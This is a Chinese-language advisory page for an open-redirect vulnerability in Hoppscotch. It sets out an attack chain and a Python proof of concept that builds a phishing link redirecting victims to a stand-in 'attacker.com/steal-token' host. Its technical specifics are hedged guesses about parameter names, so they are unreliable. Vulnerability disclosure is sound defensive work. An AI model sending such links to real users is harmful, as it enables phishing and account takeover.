CVE-2026-34931 CVSS 9.6 严重

CVE-2026-34931 Hoppscotch开放重定向漏洞

披露日期: 2026-04-02

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-34931

漏洞类型

开放重定向

CVSS评分

9.6 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

Hoppscotch

漏洞概述

Hoppscotch是一个开源API开发生态系统。在2026.3.0版本之前，该软件存在一个开放重定向漏洞。攻击者可利用此漏洞构造恶意链接，诱导用户点击后将用户重定向至攻击者控制的网站。在此过程中，攻击者能够窃取用户的身份验证令牌，进而冒充受害者登录系统，完全接管其账户。该漏洞CVSS评分为9.6，属于严重级别风险。

技术细节

该漏洞的根本原因在于Hoppscotch在处理重定向逻辑时，未对用户提供的重定向目标URL进行严格的校验和限制。攻击者可以利用应用程序中的特定参数（如redirect或next参数）注入外部恶意域名。当受害者访问攻击者精心构造的URL时，应用程序会信任该参数并执行302重定向。由于Hoppscotch是API开发工具，会话管理通常涉及Token。在重定向过程中，如果Token通过URL参数或Referer头泄露，或者攻击者利用重定向绕过同源策略读取敏感信息，即可导致Token失窃。攻击者获取Token后，无需受害者凭证即可通过API接口进行身份验证，实现对账户的完全控制，造成数据泄露、数据篡改和服务中断。

攻击链分析

STEP 1

侦察

攻击者确认目标使用Hoppscotch 2026.3.0之前的版本，并发现存在未校验的重定向参数。

STEP 2

制作诱饵

攻击者构造包含恶意重定向URL的链接，该链接指向合法的Hoppscotch域名，但参数中包含攻击者的服务器地址。

STEP 3

社会工程学攻击

攻击者通过钓鱼邮件或即时通讯工具将恶意链接发送给目标用户，诱导其点击。

STEP 4

利用漏洞

受害者点击链接，Hoppscotch应用处理请求并执行重定向，将受害者的浏览器（及可能附带的Token）导向攻击者控制的服务器。

STEP 5

账户接管

攻击者截获受害者的身份验证Token，使用该Token登录Hoppscotch，接管受害者的账户和数据。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# PoC for CVE-2026-34931 (Open Redirect)
# This script demonstrates how to craft a malicious URL to exploit the open redirect vulnerability.

import urllib.parse

def craft_exploit_url(base_url, malicious_url):
    """
    Constructs a URL that exploits the open redirect vulnerability.
    Replace 'redirect' with the actual vulnerable parameter if different.
    """
    # The vulnerable endpoint often accepts a 'redirect' or 'next' parameter
    params = {'redirect': malicious_url}
    query_string = urllib.parse.urlencode(params)
    exploit_url = f"{base_url}?{query_string}"
    return exploit_url

if __name__ == "__main__":
    target = "https://hoppscotch.io"  # Example target instance
    evil_site = "https://attacker.com/steal-token"
    
    url = craft_exploit_url(target, evil_site)
    print(f"[+] Send this link to the victim: {url}")
    print("[+] When the victim clicks, their token may be sent to the attacker.")

影响范围

Hoppscotch < 2026.3.0

防御指南

临时缓解措施

如果无法立即升级，建议在网络边界部署Web应用防火墙（WAF），配置规则拦截包含外部重定向参数的恶意请求。同时，加强对用户的安全教育，不要点击来源不明的链接。管理员应定期审计账户活动日志，一旦发现异常登录行为，应立即重置用户凭证并吊销相关API Token。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表